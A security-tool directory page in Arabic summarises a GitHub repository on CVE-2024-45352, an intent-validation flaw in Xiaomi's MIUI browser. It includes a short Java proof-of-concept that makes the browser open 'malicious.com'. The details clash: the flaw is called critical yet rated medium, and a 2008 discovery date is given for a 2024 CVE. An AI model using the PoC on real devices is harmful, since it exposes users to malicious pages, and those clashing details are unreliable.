Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
xiaomi-cve-2024-45352 — تقرير فني حول ثغرة أمنية حرجة في Xiaomi | Kitploit
أدوات/GitHubGitHub/edwins907/xiaomi-cve-2024-45352
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الجوال
GitHubedwins907/xiaomi-cve-2024-45352

xiaomi-cve-2024-45352

تقرير فني حول ثغرة أمنية حرجة في Xiaomi

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

xiaomi-cve-2024-45352

تقرير فني عن ثغرة حرجة في Xiaomi ملخص الثغرة تم اكتشاف ثغرة في المتصفح الافتراضي لـ Xiaomi (com.android.browser) على العديد من أجهزة MIUI. يفشل التطبيق في التحقق بشكل صحيح من النوايا (intents) التي يتم تمريرها عبر startActivity، مما يسمح للتطبيقات الخبيثة بفتح عناوين URL عشوائية أو تنفيذ إجراءات غير مقصودة.

  • معرف CVE: CVE-2024-45352
  • المكوّن
  • :com.android.browser
  • الخطورة: متوسطة
  • الحالة: تم الإبلاغ إلى Xiaomi (في انتظار التأكيد)
  • تاريخ الاكتشاف: [24 أبريل 2008]

🔥 إثبات المفهوم (PoC)

  1. أنشئ تطبيقًا خبيثًا بسيطًا باستخدام الـ intent التالي:
root@kitploit:~
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);
تنزيل الأداة